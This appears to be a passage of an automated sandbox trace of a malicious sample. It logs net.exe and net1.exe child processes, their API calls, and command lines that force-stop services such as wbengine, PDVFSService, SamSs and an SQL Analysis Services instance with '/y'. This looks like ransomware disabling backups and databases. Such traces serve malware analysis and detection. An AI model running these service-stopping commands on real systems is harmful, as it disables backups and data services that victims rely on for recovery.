_wcsicmp (_String1="statistics", _String2="MSOLAP$SQL_2008") returned 6 [0117.327] _wcsicmp (_String1="stop", _String2="MSOLAP$SQL_2008") returned 6 [0117.327] _wcsicmp (_String1="time", _String2="MSOLAP$SQL_2008") returned 7 [0117.327] _wcsicmp (_String1="user", _String2="MSOLAP$SQL_2008") returned 8 [0117.327] _wcsicmp (_String1="users", _String2="MSOLAP$SQL_2008") returned 8 [0117.327] _wcsicmp (_String1="msg", _String2="MSOLAP$SQL_2008") returned -8 [0117.327] _wcsicmp (_String1="messenger", _String2="MSOLAP$SQL_2008") returned -14 [0117.327] _wcsicmp (_String1="receiver", _String2="MSOLAP$SQL_2008") returned 5 [0117.327] _wcsicmp (_String1="rcv", _String2="MSOLAP$SQL_2008") returned 5 [0117.327] _wcsicmp (_String1="netpopup", _String2="MSOLAP$SQL_2008") returned 1 [0117.327] _wcsicmp (_String1="redirector", _String2="MSOLAP$SQL_2008") returned 5 [0117.327] _wcsicmp (_String1="redir", _String2="MSOLAP$SQL_2008") returned 5 [0117.327] _wcsicmp (_String1="rdr", _String2="MSOLAP$SQL_2008") returned 5 [0117.327] _wcsicmp (_String1="workstation", _String2="MSOLAP$SQL_2008") returned 10 [0117.327] _wcsicmp (_String1="work", _String2="MSOLAP$SQL_2008") returned 10 [0117.327] _wcsicmp (_String1="wksta", _String2="MSOLAP$SQL_2008") returned 10 [0117.327] _wcsicmp (_String1="prdr", _String2="MSOLAP$SQL_2008") returned 3 [0117.328] _wcsicmp (_String1="devrdr", _String2="MSOLAP$SQL_2008") returned -9 [0117.328] _wcsicmp (_String1="lanmanworkstation", _String2="MSOLAP$SQL_2008") returned -1 [0117.328] _wcsicmp (_String1="server", _String2="MSOLAP$SQL_2008") returned 6 [0117.328] _wcsicmp (_String1="svr", _String2="MSOLAP$SQL_2008") returned 6 [0117.328] _wcsicmp (_String1="srv", _String2="MSOLAP$SQL_2008") returned 6 [0117.328] _wcsicmp (_String1="lanmanserver", _String2="MSOLAP$SQL_2008") returned -1 [0117.328] _wcsicmp (_String1="alerter", _String2="MSOLAP$SQL_2008") returned -12 [0117.328] _wcsicmp (_String1="netlogon", _String2="MSOLAP$SQL_2008") returned 1 [0117.328] _wcsupr (in: _String="MSOLAP$SQL_2008" | out: _String="MSOLAP$SQL_2008") returned="MSOLAP$SQL_2008" [0117.328] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x445448 [0117.408] GetServiceKeyNameW (in: hSCManager=0x445448, lpDisplayName="MSOLAP$SQL_2008", lpServiceName=0x39aaf0, lpcchBuffer=0x2df998 | out: lpServiceName="", lpcchBuffer=0x2df998) returned 0 [0117.409] _wcsicmp (_String1="msg", _String2="MSOLAP$SQL_2008") returned -8 [0117.409] _wcsicmp (_String1="messenger", _String2="MSOLAP$SQL_2008") returned -14 [0117.409] _wcsicmp (_String1="receiver", _String2="MSOLAP$SQL_2008") returned 5 [0117.409] _wcsicmp (_String1="rcv", _String2="MSOLAP$SQL_2008") returned 5 [0117.409] _wcsicmp (_String1="redirector", _String2="MSOLAP$SQL_2008") returned 5 [0117.409] _wcsicmp (_String1="redir", _String2="MSOLAP$SQL_2008") returned 5 [0117.409] _wcsicmp (_String1="rdr", _String2="MSOLAP$SQL_2008") returned 5 [0117.409] _wcsicmp (_String1="workstation", _String2="MSOLAP$SQL_2008") returned 10 [0117.409] _wcsicmp (_String1="work", _String2="MSOLAP$SQL_2008") returned 10 [0117.409] _wcsicmp (_String1="wksta", _String2="MSOLAP$SQL_2008") returned 10 [0117.409] _wcsicmp (_String1="prdr", _String2="MSOLAP$SQL_2008") returned 3 [0117.409] _wcsicmp (_String1="devrdr", _String2="MSOLAP$SQL_2008") returned -9 [0117.409] _wcsicmp (_String1="lanmanworkstation", _String2="MSOLAP$SQL_2008") returned -1 [0117.410] _wcsicmp (_String1="server", _String2="MSOLAP$SQL_2008") returned 6 [0117.410] _wcsicmp (_String1="svr", _String2="MSOLAP$SQL_2008") returned 6 [0117.410] _wcsicmp (_String1="srv", _String2="MSOLAP$SQL_2008") returned 6 [0117.410] _wcsicmp (_String1="lanmanserver", _String2="MSOLAP$SQL_2008") returned -1 [0117.410] _wcsicmp (_String1="alerter", _String2="MSOLAP$SQL_2008") returned -12 [0117.410] _wcsicmp (_String1="netlogon", _String2="MSOLAP$SQL_2008") returned 1 [0117.410] NetServiceControl (in: servername=0x0, service="MSOLAP$SQL_2008", opcode=0x0, arg=0x0, bufptr=0x2df994 | out: bufptr=0x2df994) returned 0x889 [0117.411] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0117.411] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0117.413] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0117.414] GetFileType (hFile=0x0) returned 0x0 [0117.414] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x443e60 [0117.414] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x443e60, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0117.414] WriteFile (in: hFile=0x0, lpBuffer=0x443e60, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2df8d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2df8d4, lpOverlapped=0x0) returned 0 [0117.414] LocalFree (hMem=0x443e60) returned 0x0 [0117.414] GetFileType (hFile=0x0) returned 0x0 [0117.415] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x446110 [0117.415] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x446110, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nD", lpUsedDefaultChar=0x0) returned 2 [0117.415] WriteFile (in: hFile=0x0, lpBuffer=0x446110, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2df8d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2df8d4, lpOverlapped=0x0) returned 0 [0117.415] LocalFree (hMem=0x446110) returned 0x0 [0117.415] _ultow (in: _Dest=0x889, _Radix=3012868 | out: _Dest=0x889) returned="2185" [0117.415] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0117.415] GetFileType (hFile=0x0) returned 0x0 [0117.415] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x446110 [0117.415] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x446110, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0117.415] WriteFile (in: hFile=0x0, lpBuffer=0x446110, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2df8e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2df8e0, lpOverlapped=0x0) returned 0 [0117.415] LocalFree (hMem=0x446110) returned 0x0 [0117.415] GetFileType (hFile=0x0) returned 0x0 [0117.415] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x446110 [0117.415] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x446110, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nD", lpUsedDefaultChar=0x0) returned 2 [0117.415] WriteFile (in: hFile=0x0, lpBuffer=0x446110, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2df8e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2df8e0, lpOverlapped=0x0) returned 0 [0117.415] LocalFree (hMem=0x446110) returned 0x0 [0117.416] NetApiBufferFree (Buffer=0x441af0) returned 0x0 [0117.416] NetApiBufferFree (Buffer=0x441b08) returned 0x0 [0117.416] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSOLAP$SQL_2008 /y" [0117.416] exit (_Code=2) Process: id = "214" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6c8f0000" os_pid = "0xd68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "81" os_parent_pid = "0xec8" cmd_line = "C:\\Windows\\system32\\net1 stop PDVFSService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 608 os_tid = 0xcd4 [0118.132] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x35fe64 | out: lpSystemTimeAsFileTime=0x35fe64*(dwLowDateTime=0x1a289290, dwHighDateTime=0x1d6f0d1)) [0118.132] GetCurrentProcessId () returned 0xd68 [0118.132] GetCurrentThreadId () returned 0xcd4 [0118.132] GetTickCount () returned 0x1150d2b [0118.132] QueryPerformanceCounter (in: lpPerformanceCount=0x35fe5c | out: lpPerformanceCount=0x35fe5c*=23723277210) returned 1 [0118.132] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0118.132] __set_app_type (_Type=0x1) [0118.132] __p__fmode () returned 0x770331f4 [0118.132] __p__commode () returned 0x770331fc [0118.132] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0118.133] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0118.133] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0118.133] GetConsoleOutputCP () returned 0x1b5 [0118.133] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0118.133] SetThreadUILanguage (LangId=0x0) returned 0x409 [0118.136] sprintf_s (in: _DstBuf=0x35fe1c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0118.137] setlocale (category=0, locale=".437") returned="English_United States.437" [0118.139] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0118.139] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0118.139] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop PDVFSService /y" [0118.139] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x35fbe8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0118.139] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x6c) returned 0x4e3ae0 [0118.139] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0118.139] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x35fdec | out: Buffer=0x35fdec*=0x4e1ae8) returned 0x0 [0118.139] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x35fdec | out: Buffer=0x35fdec*=0x4e1b00) returned 0x0 [0118.139] _fileno (_File=0x77032900) returned -2 [0118.139] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0118.139] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0118.139] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0118.139] _wcsicmp (_String1="config", _String2="stop") returned -16 [0118.139] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0118.139] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0118.139] _wcsicmp (_String1="file", _String2="stop") returned -13 [0118.139] _wcsicmp (_String1="files", _String2="stop") returned -13 [0118.139] _wcsicmp (_String1="group", _String2="stop") returned -12 [0118.139] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0118.140] _wcsicmp (_String1="help", _String2="stop") returned -11 [0118.140] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0118.140] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0118.140] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0118.140] _wcsicmp (_String1="session", _String2="stop") returned -15 [0118.140] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0118.140] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0118.140] _wcsicmp (_String1="share", _String2="stop") returned -12 [0118.140] _wcsicmp (_String1="start", _String2="stop") returned -14 [0118.140] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0118.140] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0118.140] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0118.140] _wcsicmp (_String1="accounts", _String2="PDVFSService") returned -15 [0118.140] _wcsicmp (_String1="computer", _String2="PDVFSService") returned -13 [0118.140] _wcsicmp (_String1="config", _String2="PDVFSService") returned -13 [0118.140] _wcsicmp (_String1="continue", _String2="PDVFSService") returned -13 [0118.140] _wcsicmp (_String1="cont", _String2="PDVFSService") returned -13 [0118.140] _wcsicmp (_String1="file", _String2="PDVFSService") returned -10 [0118.140] _wcsicmp (_String1="files", _String2="PDVFSService") returned -10 [0118.140] _wcsicmp (_String1="group", _String2="PDVFSService") returned -9 [0118.140] _wcsicmp (_String1="groups", _String2="PDVFSService") returned -9 [0118.140] _wcsicmp (_String1="help", _String2="PDVFSService") returned -8 [0118.140] _wcsicmp (_String1="helpmsg", _String2="PDVFSService") returned -8 [0118.140] _wcsicmp (_String1="localgroup", _String2="PDVFSService") returned -4 [0118.140] _wcsicmp (_String1="pause", _String2="PDVFSService") returned -3 [0118.140] _wcsicmp (_String1="session", _String2="PDVFSService") returned 3 [0118.140] _wcsicmp (_String1="sessions", _String2="PDVFSService") returned 3 [0118.140] _wcsicmp (_String1="sess", _String2="PDVFSService") returned 3 [0118.140] _wcsicmp (_String1="share", _String2="PDVFSService") returned 3 [0118.140] _wcsicmp (_String1="start", _String2="PDVFSService") returned 3 [0118.140] _wcsicmp (_String1="stats", _String2="PDVFSService") returned 3 [0118.140] _wcsicmp (_String1="statistics", _String2="PDVFSService") returned 3 [0118.140] _wcsicmp (_String1="stop", _String2="PDVFSService") returned 3 [0118.140] _wcsicmp (_String1="time", _String2="PDVFSService") returned 4 [0118.140] _wcsicmp (_String1="user", _String2="PDVFSService") returned 5 [0118.140] _wcsicmp (_String1="users", _String2="PDVFSService") returned 5 [0118.140] _wcsicmp (_String1="msg", _String2="PDVFSService") returned -3 [0118.141] _wcsicmp (_String1="messenger", _String2="PDVFSService") returned -3 [0118.141] _wcsicmp (_String1="receiver", _String2="PDVFSService") returned 2 [0118.141] _wcsicmp (_String1="rcv", _String2="PDVFSService") returned 2 [0118.141] _wcsicmp (_String1="netpopup", _String2="PDVFSService") returned -2 [0118.141] _wcsicmp (_String1="redirector", _String2="PDVFSService") returned 2 [0118.141] _wcsicmp (_String1="redir", _String2="PDVFSService") returned 2 [0118.141] _wcsicmp (_String1="rdr", _String2="PDVFSService") returned 2 [0118.141] _wcsicmp (_String1="workstation", _String2="PDVFSService") returned 7 [0118.141] _wcsicmp (_String1="work", _String2="PDVFSService") returned 7 [0118.141] _wcsicmp (_String1="wksta", _String2="PDVFSService") returned 7 [0118.141] _wcsicmp (_String1="prdr", _String2="PDVFSService") returned 14 [0118.141] _wcsicmp (_String1="devrdr", _String2="PDVFSService") returned -12 [0118.141] _wcsicmp (_String1="lanmanworkstation", _String2="PDVFSService") returned -4 [0118.141] _wcsicmp (_String1="server", _String2="PDVFSService") returned 3 [0118.141] _wcsicmp (_String1="svr", _String2="PDVFSService") returned 3 [0118.141] _wcsicmp (_String1="srv", _String2="PDVFSService") returned 3 [0118.141] _wcsicmp (_String1="lanmanserver", _String2="PDVFSService") returned -4 [0118.141] _wcsicmp (_String1="alerter", _String2="PDVFSService") returned -15 [0118.141] _wcsicmp (_String1="netlogon", _String2="PDVFSService") returned -2 [0118.141] _wcsupr (in: _String="PDVFSService" | out: _String="PDVFSSERVICE") returned="PDVFSSERVICE" [0118.141] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4e54b0 [0119.036] GetServiceKeyNameW (in: hSCManager=0x4e54b0, lpDisplayName="PDVFSSERVICE", lpServiceName=0x39aaf0, lpcchBuffer=0x35fd88 | out: lpServiceName="", lpcchBuffer=0x35fd88) returned 0 [0119.037] _wcsicmp (_String1="msg", _String2="PDVFSSERVICE") returned -3 [0119.037] _wcsicmp (_String1="messenger", _String2="PDVFSSERVICE") returned -3 [0119.037] _wcsicmp (_String1="receiver", _String2="PDVFSSERVICE") returned 2 [0119.037] _wcsicmp (_String1="rcv", _String2="PDVFSSERVICE") returned 2 [0119.037] _wcsicmp (_String1="redirector", _String2="PDVFSSERVICE") returned 2 [0119.037] _wcsicmp (_String1="redir", _String2="PDVFSSERVICE") returned 2 [0119.037] _wcsicmp (_String1="rdr", _String2="PDVFSSERVICE") returned 2 [0119.037] _wcsicmp (_String1="workstation", _String2="PDVFSSERVICE") returned 7 [0119.037] _wcsicmp (_String1="work", _String2="PDVFSSERVICE") returned 7 [0119.037] _wcsicmp (_String1="wksta", _String2="PDVFSSERVICE") returned 7 [0119.037] _wcsicmp (_String1="prdr", _String2="PDVFSSERVICE") returned 14 [0119.037] _wcsicmp (_String1="devrdr", _String2="PDVFSSERVICE") returned -12 [0119.037] _wcsicmp (_String1="lanmanworkstation", _String2="PDVFSSERVICE") returned -4 [0119.037] _wcsicmp (_String1="server", _String2="PDVFSSERVICE") returned 3 [0119.037] _wcsicmp (_String1="svr", _String2="PDVFSSERVICE") returned 3 [0119.037] _wcsicmp (_String1="srv", _String2="PDVFSSERVICE") returned 3 [0119.037] _wcsicmp (_String1="lanmanserver", _String2="PDVFSSERVICE") returned -4 [0119.037] _wcsicmp (_String1="alerter", _String2="PDVFSSERVICE") returned -15 [0119.037] _wcsicmp (_String1="netlogon", _String2="PDVFSSERVICE") returned -2 [0119.037] NetServiceControl (in: servername=0x0, service="PDVFSSERVICE", opcode=0x0, arg=0x0, bufptr=0x35fd84 | out: bufptr=0x35fd84) returned 0x889 [0119.038] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0119.038] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0119.039] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0119.040] GetFileType (hFile=0x0) returned 0x0 [0119.040] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x4e3ed0 [0119.040] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x4e3ed0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0119.040] WriteFile (in: hFile=0x0, lpBuffer=0x4e3ed0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x35fcc4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fcc4, lpOverlapped=0x0) returned 0 [0119.040] LocalFree (hMem=0x4e3ed0) returned 0x0 [0119.040] GetFileType (hFile=0x0) returned 0x0 [0119.040] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4e6178 [0119.040] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4e6178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nN", lpUsedDefaultChar=0x0) returned 2 [0119.040] WriteFile (in: hFile=0x0, lpBuffer=0x4e6178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x35fcc4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fcc4, lpOverlapped=0x0) returned 0 [0119.040] LocalFree (hMem=0x4e6178) returned 0x0 [0119.040] _ultow (in: _Dest=0x889, _Radix=3538164 | out: _Dest=0x889) returned="2185" [0119.040] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0119.041] GetFileType (hFile=0x0) returned 0x0 [0119.041] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4e6178 [0119.041] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4e6178, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0119.041] WriteFile (in: hFile=0x0, lpBuffer=0x4e6178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x35fcd0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fcd0, lpOverlapped=0x0) returned 0 [0119.041] LocalFree (hMem=0x4e6178) returned 0x0 [0119.041] GetFileType (hFile=0x0) returned 0x0 [0119.041] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4e6178 [0119.041] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4e6178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nN", lpUsedDefaultChar=0x0) returned 2 [0119.041] WriteFile (in: hFile=0x0, lpBuffer=0x4e6178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x35fcd0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fcd0, lpOverlapped=0x0) returned 0 [0119.041] LocalFree (hMem=0x4e6178) returned 0x0 [0119.041] NetApiBufferFree (Buffer=0x4e1ae8) returned 0x0 [0119.041] NetApiBufferFree (Buffer=0x4e1b00) returned 0x0 [0119.042] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop PDVFSService /y" [0119.042] exit (_Code=2) Process: id = "215" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x66f80000" os_pid = "0xce8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop wbengine /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 609 os_tid = 0xa80 Process: id = "216" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6bb48000" os_pid = "0xf04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "108" os_parent_pid = "0x62c" cmd_line = "C:\\Windows\\system32\\net1 stop SamSs /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 610 os_tid = 0x69c [0119.644] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fa44 | out: lpSystemTimeAsFileTime=0x16fa44*(dwLowDateTime=0x1b0d1690, dwHighDateTime=0x1d6f0d1)) [0119.644] GetCurrentProcessId () returned 0xf04 [0119.644] GetCurrentThreadId () returned 0x69c [0119.644] GetTickCount () returned 0x1151305 [0119.644] QueryPerformanceCounter (in: lpPerformanceCount=0x16fa3c | out: lpPerformanceCount=0x16fa3c*=23874493021) returned 1 [0119.644] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0119.644] __set_app_type (_Type=0x1) [0119.644] __p__fmode () returned 0x770331f4 [0119.645] __p__commode () returned 0x770331fc [0119.645] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0119.645] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0119.645] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0119.645] GetConsoleOutputCP () returned 0x1b5 [0119.646] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0119.646] SetThreadUILanguage (LangId=0x0) returned 0x409 [0119.649] sprintf_s (in: _DstBuf=0x16f9fc, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0119.649] setlocale (category=0, locale=".437") returned="English_United States.437" [0119.651] GetStdHandle (nStdHandle=0xfffffff5) returned 0x470 [0119.651] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0119.651] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SamSs /y" [0119.651] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16f7c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0119.651] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x5e) returned 0x623ac8 [0119.651] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0119.651] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16f9cc | out: Buffer=0x16f9cc*=0x621ad0) returned 0x0 [0119.651] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16f9cc | out: Buffer=0x16f9cc*=0x621ae8) returned 0x0 [0119.652] _fileno (_File=0x77032900) returned -2 [0119.652] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0119.652] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0119.652] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0119.652] _wcsicmp (_String1="config", _String2="stop") returned -16 [0119.652] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0119.652] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0119.652] _wcsicmp (_String1="file", _String2="stop") returned -13 [0119.652] _wcsicmp (_String1="files", _String2="stop") returned -13 [0119.652] _wcsicmp (_String1="group", _String2="stop") returned -12 [0119.652] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0119.652] _wcsicmp (_String1="help", _String2="stop") returned -11 [0119.652] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0119.652] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0119.652] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0119.652] _wcsicmp (_String1="session", _String2="stop") returned -15 [0119.652] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0119.652] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0119.652] _wcsicmp (_String1="share", _String2="stop") returned -12 [0119.652] _wcsicmp (_String1="start", _String2="stop") returned -14 [0119.652] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0119.652] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0119.652] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0119.652] _wcsicmp (_String1="accounts", _String2="SamSs") returned -18 [0119.652] _wcsicmp 